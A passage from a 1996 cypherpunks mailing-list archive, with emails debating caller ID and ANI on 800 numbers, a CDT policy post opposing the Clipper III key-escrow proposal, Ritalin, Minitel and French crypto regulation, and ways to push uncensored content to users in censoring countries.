 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 05:11:53 +0800
To: cypherpunks@toad.com
Subject: Re: CCC Crypto Lock
Message-ID: <1.5.4.32.19960712133903.008c6578@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 04:10 AM 7/6/96 -0700, you wrote:
>MicroPatent, 4 July 96
> 
> 
>Systems and methods for protecting software from 
>unlicensed copying and use (Assignee -- Convex Computer 
>Corporation) 
> 
>...
> 
>Assignee: Convex Computer Corporation 
> 
>Patent Number: 5530752 
> 
>Issue Date: 1996 06 25 
> 
>Inventor(s): Rubin, Robert J. 
> 
>If you would like to purchase a copy of this patent, 
>please call MicroPatent at 800-984-9800.  
> 
>Copyright 1996, MicroPatent 

I think there are already such algorithms in use in Europe. (Why buy the
patent, if it's already around?)

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 04:42:13 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <1.5.4.32.19960712133920.008c9bd0@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 01:18 AM 7/6/96 -0500, you wrote:
>At 12:09 AM 7/6/96 -0500, snow@smoke.suba.com wrote:
>>On Fri, 5 Jul 1996, Erle Greer wrote:
>>
>>> Word-List Builder  (this is not an ad)
>Unix, you can do, but the recursive subdirs aren't a prob for me.  A final
dream
>would be to convert it to VB4, use MS's WWW custom control, and unleash it as a
>spider.

If you send me the source, I'll give it a shot (port to vb4 with x-controls)

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 13 Jul 1996 14:58:40 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <199607122100.QAA16047@homeport.org>
MIME-Version: 1.0
Content-Type: text


They lie.  ("why would anyone need another?")

You can avoid ANI by placing an operator assisted toll free call.
Dial 0, and say, "Hi, I'm getting funny beeps when I try to dial
800-905-1514.  Could you help me place the call?"

(Thats the OKBOMB FBI tip number.  Oddly, the FBI is still offering a
$2m reward for information.  And I thought they had their scapegoat.)

Incidentally, Use of the NAME, INITIALS, or SEAL of the FBI is
restricted by law and may be used only with written permission of the
FBI.  (www.fbi.giv)

Adam

David Mazieres wrote:
| 
| 
| My last phone bill said that Nynex is now giving out people's names in
| addidtion to their phone numbers over caller-id.  I therefore called
| Nynex and told them to block caller-id on my phone line.
| 
| They said no problem, but...  They said nothing I can do will block it
| when I call 800 numbers.  "The people with 800 numbers have special
| software, and there is nothing you can do to block your identity when
| calling them.  Not even *67."
| 
| Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
| never again call an 800 number anonymously to get information about
| something unless I go out to a pay phone.  What an incredible
| inconvenience, and how truly depressing.
| 
| I know 800 number owners probably used to be able to get lists of
| calling phone numbers on their phone bills, but this is less
| disturbing as it would take significant effort to match up the lists
| after the fact.  I just want to be able to call up companies and say,
| for instance, "If I buy your product, can it do X?" as opposed to, for
| instance, "I'm stuck with your product, can it do X?".  People are
| often more helpful in the former case.  Now, though, they'll know
| exactly who I am before they even say hello.
| 
| David
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 13 Jul 1996 13:20:15 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SV4.3.91.960712191424.22163H-100000@larry.infi.net>
Message-ID: <199607130024.RAA31724@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:
> 
> > Caller ID isn't for people, it's for businesses who want to
> > track callers.  They're willing to pay for that service, enough
> 
> 
>    Privacy isn't for parasites. 

800 numbers aren't free.  They're just paid out
of a different account.  I don't pay for them
directly, but I do indirectly through the increased
prices of the goods and services sold by the
company with the 800 number.  I'd hardly call
that being a 'parasite'.

> It's for people who are willing to pay for
>    their own phone calls. 

Too bad there's not always a choice, a lot
of companies use only 800 numbers for service
hotlines etc.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sat, 13 Jul 1996 15:28:10 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <31E6D348.802@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:

> > They said no problem, but...  They said nothing I can do will block it
> > when I call 800 numbers. 

CID != ANI, which has been around for a long time.  800 numbers have
always had ANI available, to my knowledge.

> Their answer: "that's just the way it works".

Correcto-mundo.

> > Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> > never again call an 800 number anonymously to get information about
> > something unless I go out to a pay phone.  What an incredible
> > inconvenience, and how truly depressing.

Not "never again", but "never ever, past or future".  All you 800
calls you made in the past went out with your phone number delivered
to the recipient.

> Caller ID isn't for people, it's for businesses who want to
> track callers.  

Bull cookies.  I have caller ID boxes on my lines.  If somebody want to
make noise in my house in an effort to get my attention, I damn well
want to know who they are.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 13 Jul 1996 14:01:50 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <Pine.GUL.3.94.960712173806.8013B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jul 1996, David Mazieres wrote:

> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.

They're paying for the call. They've got a right to know. Otherwise, you
could cause a lot of damage with a robo-dialer. It would certainly be nice
if the phone company told you about this up-front, though.

If you need it, a free anonymous re-phoner is documented at:

 http://pages.ripco.com:8080/~glr/block.html

- -rich
 http://www.c2.org/~rich/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMebxtpNcNyVVy0jxAQEi7QH9HsqdhmW0m0/wCVPH2CO9PlP2HVjVhaic
tSLOsh/dQZM36tB8SLWlPhJRoQw2mXFfefH2BkRfv9gx74sRFTLFXw==
=btXH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sat, 13 Jul 1996 14:06:19 +0800
To: cypherpunks@toad.com
Subject: Can't block caller ID in Massachusetts? (fwd)
Message-ID: <m0uer9L-0001uYC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From: David Mazieres <dm@amsterdam.lcs.mit.edu>
> To: cypherpunks@toad.com
> Subject: Can't block caller ID in Massachusetts?
> 
> My last phone bill said that Nynex is now giving out people's names in
> addidtion to their phone numbers over caller-id.  I therefore called
> Nynex and told them to block caller-id on my phone line.
> 
> They said no problem, but...  They said nothing I can do will block it
> when I call 800 numbers.  "The people with 800 numbers have special
> software, and there is nothing you can do to block your identity when
> calling them.  Not even *67."
> 
> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.
> 

This has been true for years. On 800 numbers, the receiver gets ANI, not
CID. Check newsgroups like alt.dcom.telecom, comp.dcom.telecom, etc.:
there's always somebody talking about CID and ANI.

In the back of my mind, I remember hearing about an anonymizer for
800-number calls. Maybe at WilTel. Check the search engine of your choice.

Personally, I like Caller ID, because it gives individuals a service
that formerly only governments and corporations could get.

--gimonca@skypoint.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Jul 1996 13:19:25 +0800
To: ichudov@algebra.com
Subject: Re: ADD and Unix, + Ritalin Questions
Message-ID: <01I6ZTLVI4I8984TP7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 10-JUL-1996 03:56:31.76

>3. Are there any long term effects from Ritalin, and can it
>be discontinued easily?

	Well, the FDA seems to think it's addictive... my experience with it
(off on weekends, evenings, and in the summer) would appear to say otherwise.
There is some appetite suppression, which allegedly may lead to growth
suppression, but I have some doubt about this (I'm over 6'1").
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sat, 13 Jul 1996 08:02:25 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <1.5.4.32.19960712133842.008c3308@193.246.3.200>
Message-ID: <199607121616.SAA04183@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I, Bryce wrote:
>
> Which is where the small payments to ratings producers from
> ratings consumers comes in.  Again this is just the
> quantification of a phenomena that we all take for granted.
> (Namely, that people who produce quality ratings are producing a
> value and trading/contributing it to others.)


Remo Pini <rp@rpini.com> wrote:
> 
> It sure sounds like I'll have to pay, so someone decides for me, wether some
> piece of info is important to me.


Key phrase here is "have to " as opposed to "choose to".  (Just 
like always...)


> Now, if that isn't the first step to censorship!


It's not.


One good way to get started on the road to censorship is to 
believe that everyone has a right to the means of publication.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMeZ6c0jbHy8sKZitAQHZagMAg0nRknUZDn0m5y57xJPKAMTygF5NRXZq
nkR7Ad5R2SYiHN5OPIsPQOtR2NNPEnjPL0PKjMtDvF4OkKZ/OTt3pQKE1dUN7Q8Y
FhHk9uSU7aSWqIaN4hItU0B1B1BeJSgJ
=jUlr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Sat, 13 Jul 1996 14:42:58 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates Support for Key Escrow
Message-ID: <v02140b1bae0c80b15a2e@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 27
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 27                        July 12, 1996

 CONTENTS: (1) No New News on Encryption - VP Gore Reiterates Support for
               Key Escrow
           (2) How to Subscribe/Unsubscribe
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) NO NEW NEWS ON ENCRYPTION - VP GORE REITERATES SUPPORT FOR KEY ESCROW

Despite the growing pressure from Congress, privacy advocates, the computer
industry, and the public for the reform of US encryption policy, the
Administration continues to embrace its Clipper III key-escrow encryption
proposal.  In a written statement issued Friday (7/12), the Vice President
announced that the Administration will continue to push for the adoption of
a massive public key infrastructure to enable law enforcement access to
encryption communications and continue to rely on cold war-era export
controls.

[The full text of the announcement is available on CDT's Encryption
 Policy Issues Page: http://www.cdt.org/crypto/]

CDT is disappointed that the Administration's latest statement offered no
new solutions to what is becoming a critical policy issue for the future of
the Internet and the development of a secure and trusted global information
infrastructure.

Friday's announcement comes amid growing concern from bi-partisan members
of Congress, computer industry leaders, privacy advocates, and the public.
Recent calls for changes in current US encryption policy include:

* Bipartisan legislation in both the House and Senate designed to relax
  US encryption export controls and encourage the widespread
  availability of strong, easy to use encryption technologies.

* The Security and Freedom through Encryption (SAFE) Forum, held on July
  1st, where members of Congress, computer industry leaders, privacy
  advocates and the public discussed the need to reform US encryption
  policy.

* The recent report by the National Research Council which criticizes
  current policy as failing to address the needs of an information age
  society.

These developments represent a growing consensus among members of Congress,
the computer industry, and privacy advocates that current US encryption
policy is harming the competitiveness of US industry and endangering the
privacy of computer users. Our understanding of this consensus does not
match the conclusion the Vice President reaches that: "A consensus is
emerging around the vision of a global cryptography system that permits the
use of any encryption method the user chooses, with a stored key to unlock
when necessary". CDT sees no evidence of broad support for a key escrow
approach.

While the Administration seems to acknowledge the importance of encryption
for privacy and electronic commerce, neither the current policy nor its
predecessors have met the needs which virtually all involved in this debate
now see. Since 1992, the Administration has continued to offer solutions
which fail to recognize the privacy needs of individual computer users and
the realities of the global economy.  While law enforcement and national
security considerations are important factors which must be addressed, the
Administration's current proposal, along with Clipper I and Clipper II,
continues to put law enforcement and national security concerns above the
privacy and security needs of the American public.

SUMMARY OF VICE PRESIDENT GORE'S STATEMENT

While putting forward an initiative ostensibly designed to make encryption
more available to computer users, the Administration would do so at a high
price: Individuals would be required to place their most private personal
encryption keys in the hands of third parties.

Today's statement is essentially a re-statement of the Clipper III proposal
released in May.  Among other things, the Vice President:

*  Called for the liberalization of export controls provided computer
   users participate in a "global key management infrastructure"
   designed to make personal encryption keys accessible to law
   enforcement.

*  Reiterated the Administration's opposition to the bipartisan
   encryption legislation introduced this Spring in the House and
   Senate, which would ease export controls.

*  Announced that a Cabinet Committee will send detailed
   recommendations regarding implementation of this proposal to the
   President by early September.

*  Indicated that the Administration "is considering" interim measures
   until a key escrow system is in place, including:

   -  Liberalizing export controls for certain industries,

   -  Developing performance standards for key recovery systems that
      will be eligible for export.

   -  Launching key recovery pilot projects.

   -  Moving jurisdiction over encryption export licenses from
      the State Department to the Commerce Department (The Burns/Leahy
      Pro-CODE bill contains a similar provision).

The full text of the Vice President's Statement, along with the Clipper III
proposal, the text of the Pro-CODE bill and other legislation, and
detailed background information on the encryption policy debate, is
available on CDT's encryption policy resource page:

   http://www.cdt.org/crypto/

CDT believes that a far more sensible approach to encryption is offered by
the bipartisan legislation introduced this Spring to ease export controls,
including:  S. 1726, the Pro-Code Act introduced by Senators Burns (R-MT),
Leahy (D-VT), Pressler (R-SD), Lott (R-MS), Wyden (D-OR), Simpson (R-WY),
Murray (D-WA), and others; S.1567, authored by Sen. Leahy with many of the
same co-sponsors; and H.R. 3011, introduced by in the House of
Representatives by Reps. Bob Goodlatte (R-VA), Anna Eshoo (D-CA), Tom
Campbell (R-CA) Zoe Lofgren (D-CA), and a bi-partisan group of over 20
others.

NEXT STEPS

CDT will continue to work with Senators Burns, Leahy, Pressler, Wyden and
Reps, Eshoo, Goodlatte, and others to encourage the widespread availability
of strong encryption by pushing for passage of legislation to relax export
controls on encryption.  The full Senate Commerce Committee, chaired by
Senator Larry Pressler (R-SD), is expected to hold hearings on the Pro-CODE
bill during the week of July 22. CDT is working to cybercast that hearing
live on the Internet. Please continue to visit CDT's encryption policy
issues page for the latest information on this issue.

------------------------------------------------------------------------

(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.27                                            7/12/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Jul 1996 14:25:15 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Another bad idea
Message-ID: <01I6ZU6HCZ5Y984TP7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"WlkngOwl@unix.asb.com"  "Deranged Mutant" 10-JUL-1996 05:02:42.84

>Great idea. Get some (possibly) innocent techie in an oppressive 
>country thrown in jail or executed.

	If these countries didn't value their technical people and what they
can do, they wouldn't be allowing them on the Internet (even in a restricted
way) in the first place. The above would only be a likely scenario if the
effort wasn't big enough - didn't cover enough people. China almost collapsed
(pity it didn't) with the Cultural Revolution; I doubt many in government there
who remember that time want to go through it again, particularly considering
the current level of instability there.

>Or perhaps s/he gets offended, 
>contributing to the notion that all Westerners are evil perverts 
>out to corrupt them.

	This is a possible problem with the pornography approach, yes; some
form of human rights information may be more suitable, even in countries in
which one of the main crackdowns on the Internet is anti-sex.

>> 	An extension of this for web sites, which I understand as possible
>> but difficult, would be to swap anyone from such a country trying to get
>> acces to a technical web site to instead receive "subversive" information or
>> pictures. (The pornography mentioned above would probably be more effective
>> in picture format; other pictures might include information on human rights
>> abuses).

>Damn aggrevating for that user, and it could get him/her in trouble.

	Yes. One possible solution for the aggrevation problem would be to
include material on human rights, cryptography, etcetera _and_ the tech info
that the person was looking for. While this would still give these countries
easy access to the technical info (a bad outcome), it would also lead to the
people getting information that the country's government didn't want.

>On a wide-scale it could provoke responses from those countries.  
>Imagine this list being bombarded with propaganda, or perhaps 
>somebody here looking at an anti-censorship web page getting 
>pro-censorship messages from religious fundamentalists.

	If you look at someone's web page and A. they haven't made a contract
with you to do otherwise and B. you haven't been smart enough to go through an
anonymizing web server or an anonymous account, you need to realize that they
are likely to keep info on you. I customarily don't use my own account for
web viewing for that reason.
	Bombardment of lists like these with propaganda, etcetera, is an
admitted possible problem. We're currently seeing something of the sort on
alt.religion.scientology, but (according to what I've gathered) they seem to be
dealing with that pretty well. I have my doubts how effectively the Chinese,
etcetera governments are likely to be in carrying out such attacks; they aren't
noticeably good at Internet-awareness.

>Or it could encourage them to use special firewalls which filter 
>content and disallow graphics... (probably many US-based companies 
>would be all-too-happy to sell them the software to do it), or even 
>close themselves off from the Internet altogether, perhaps form 
>separate, unconnected Family/Islamic/Chinese-values networks.

	How, precisely, is one going to filter out graphics from web sites in
Chinese? Ascii text and ideographs don't exactly get along. One interesting
option would be text, possibly varied to disable practical OCR, in the form of
graphics. This is more of a problem for web sites in English, although simple
denial of such to such countries has its advantages (as per some earlier
discussions).
	In the latter case, they aren't going to get the technical information
that's their reason for getting on the Internet in the first place. These
countries are largely third-world in locally understood technology, anyway;
the exception is for those who have gotten training in the West - note that
one of the biggest trade _surpluses_ of the US is in graduate education in
technical fields.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 13 Jul 1996 14:31:28 +0800
To: "'E. ALLEN SMITH'" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: RE: FW: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01BB7020.42BF0560@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	E. ALLEN SMITH

	Actually, my Ritalin was one of the things that led me to come to the
conclusion that drug laws were nonsense. It's a Schedule II drug that I never
felt _any_ addiction to; I was off it on evenings, weekends, and during
holidays. So at least in my case it had a pro-libertarian effect.
........................................................................



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Jul 1996 13:56:41 +0800
To: blancw@accessone.com
Subject: Re: FW: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01I6ZUBURN18984TP7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"blancw@accessone.com"  "blanc" 10-JUL-1996 06:04:36.86

>	As Tim said, the selective application of drugs or persecution =
>regarding their use points to a great hypocrisy (and deterioration of =
>character), and the more widespread the acceptance of hypocritical =
>double-standards, the higher the rate-o-meter goes up in favor of =
>statism.  At the very least, all the confusion surrounding drug use will =
>create "disrespect for Authority" (which in turn will inspire statists =
>to propose further crack-downs, pardon the pun, on "criminals").

	Actually, my Ritalin was one of the things that led me to come to the
conclusion that drug laws were nonsense. It's a Schedule II drug that I never
felt _any_ addiction to; I was off it on evenings, weekends, and during
holidays. So at least in my case it had a pro-libertarian effect.

>	It makes me think of those Communist countries (remember them?) where =
>political dissenters were been labelled insane - the protesters were the =
>ones identified as having the problems, not the State.  The imprisoned =
>troublemakers were then drugged, thus taking care of their "irrational" =
>behavior and lack of appreciation.

	The matter is that Ritalin isn't acting as a mind control pill, or
whatever the hysterics are claiming. Indeed, I nominate it as one of the more
transhumanist drugs I know of (for adults with ADHD and children), and I've
done somewhat of a study of the subject.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Salber <daniel.salber@imag.fr>
Date: Sat, 13 Jul 1996 09:06:08 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: Minitel "saved" by hackers?
In-Reply-To: <1.5.4.32.19960712212426.002e925c@giasdl01.vsnl.net.in>
Message-ID: <v03007610ae0c2aab29e3@[129.88.32.100]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:31 +0500 on 12/07/96, Arun Mehta wrote:

> Has FT ever denied permission (to hard-core sex servers or neo-Nazis, for
> example)? That, the tax they charge and the prohibition of encryption make
> it too centralized for my taste. And will ultimately kill it. The longer the
> French take to migrate to the Internet, the worse for them (IMHO).

The tax wasn't charged by FT but by the government (ok, FT is
government-owned but it makes a difference nevertheless). Yes there have
been a few cases of censorship by the government (not FT!). As fas as I
remember the reasons were like chat services that allowed online
prostitutes or drugs dealers.

Prohibition of encryption is definitely a problem here. Although it's not
officially prohibited, you have to request a permit to use strong crypto,
and you don't get one if you plan to use "too strong" crypto like RSA and
you're not a "serious" institution like a bank. Some recent changes in the
organization of the security agency in charge of delivering permits as well
as the current trends towards the deregulation of crypto export in the US
may bring some change... some day. (see http://www.cnam.fr/Network/Crypto/
-- in french -- for details of french encryption regulations)

> Why not link up videotex in every country with the Internet? Let people surf
> the Web using their TVs and remotes (and maybe a keyboard with an infra-red
> link). That's what I'm trying to tell our utter failure of a videotex
> service in India.

As far as I know, most videotex systems use 1200 bps and crude 8-color
graphics. That's ok to make use of many web sites, but the web seems to be
heading full speed towards higher and higher bandwidth and interactivity.

Daniel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 13 Jul 1996 15:09:46 +0800
To: David Mazieres <cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <v03007800ae0cb032f92b@[17.219.103.243]>
MIME-Version: 1.0
Content-Type: text/plain


David Mazieres <dm@amsterdam.lcs.mit.edu> notes that he can't prevent
his phone number from going to 800 number providers.

800 numbers are, effectively, collect phone calls. The receiving
party is paying all call costs, including a surcharge for the
collect and number delivery services. Even if you make a "normal"
collect call to a residential number, the calling phone number will
appear on the receiver's phone bill.

That said, there are a few additional points that may be of interest:

-- even if David's name is not delivered to the 800 (or caller ID)
receiver, there are a variety of commercial services that can
link a published phone number with it's owner's name and address.
Non-published numbers can be linked to a (fairly small) geographical
area, giving useful economic and marketing information.

-- a large commercial site can link phone number to name and address
while the phone is ringing. This lets them do a variety of triage on the
call. For example:
  -- Never seen this number? Good demographics? Must be a new customer.
     Answer quickly.
  -- Ordered lots from us before? Answer quickly.
  -- Whiner, always complaining? "Your call will be answered by the next
     available representative." Play 20 minutes of Gershwin.
  -- Bad demographics? "Your call will be ..." Play 10 minutes of Gershwin.
And so forth.

Martin Minow
minow@apple.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 13 Jul 1996 13:23:59 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <Pine.SV4.3.91.960712185447.22163A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Fri, 12 Jul 1996 11:55:27 -0400 (EDT)
> From: David Mazieres <dm@amsterdam.lcs.mit.edu>
> 
> after the fact.  I just want to be able to call up companies and say,


    I just want to be able to go to my local steakhouse joint, feed 
myself and a couple of bimbos, and tell them to charge it to David Mazieres.

.....What?!?   I'm supposed to _pay_ for my way in life?  They didn't 
teach me that at MIT!

Write a letter to Ted Kennedy and Barney Frank - my human rights are 
being violated!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 13 Jul 1996 12:52:20 +0800
To: abacard@well.com
Subject: Re: Needed: Bay Area "Cracker" for TV Show
In-Reply-To: <199607121640.JAA11127@well.com>
Message-ID: <Pine.SV4.3.91.960712190148.22163C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> July 11th, a San Francisco television reporter called me. He wants to
> broadcast a story about "crackers". He'd like someone who can describe,
> on-the-air


Hey peachpit

The cartoon news broadcasts are part of the problem, not part of the 
solution.

I vote that San Francisco be given back to the Mexicans, until the 
current generation of nudnicks dies off. We'lll steal it back in 40 years, 
after there arises a generation hardened by life in the desert.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 13 Jul 1996 14:48:18 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <Pine.SV4.3.91.960712191424.22163H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Caller ID isn't for people, it's for businesses who want to
> track callers.  They're willing to pay for that service, enough


   Privacy isn't for parasites. It's for people who are willing to pay for
   their own phone calls. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 13 Jul 1996 12:45:52 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <m0uermK-0000s9C@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray enscribed thusly:

> Caller ID isn't for people, it's for businesses who want to
> track callers.  They're willing to pay for that service, enough
> to make it worth the while of the phone companies to spend many
> millions on a campaign of lies (excuse me, "PR") to convince us
> that we need CID for "safety".

	BULLSH*T!  Pure, unadulterated, BULLSH*T!  Businesses don't NEED
Caller ID!  They've got (and have had for a long time) ANI!  Most businesses
don't even WANT CLID!  You can block CLID.  You can't block ANI.

	This was the ultimate and supreme LIE behind all of the fights
over CLID.  All the arguements about how businesses would then abuse this
and that and would invade our privacy was all a crock of SH*T.  All CLID
did was give to the consumer SOME of what businesses have had for years.
The whole business abuse arguement was pure red herring...

	Even in California, where CLID was stopped for a while, businesses
still had ANI.  Do you actually think your numbers were safe just because
they weren't delivered to residences?  Hell no!  Businesses could still
get them if they wanted them and there was nothing you could do about it!
To top it off - you THOUGHT you were safe!

	I know of some businesses whose sole reason for getting a 1-800
number was to be able to log and track that information.  Every wonder
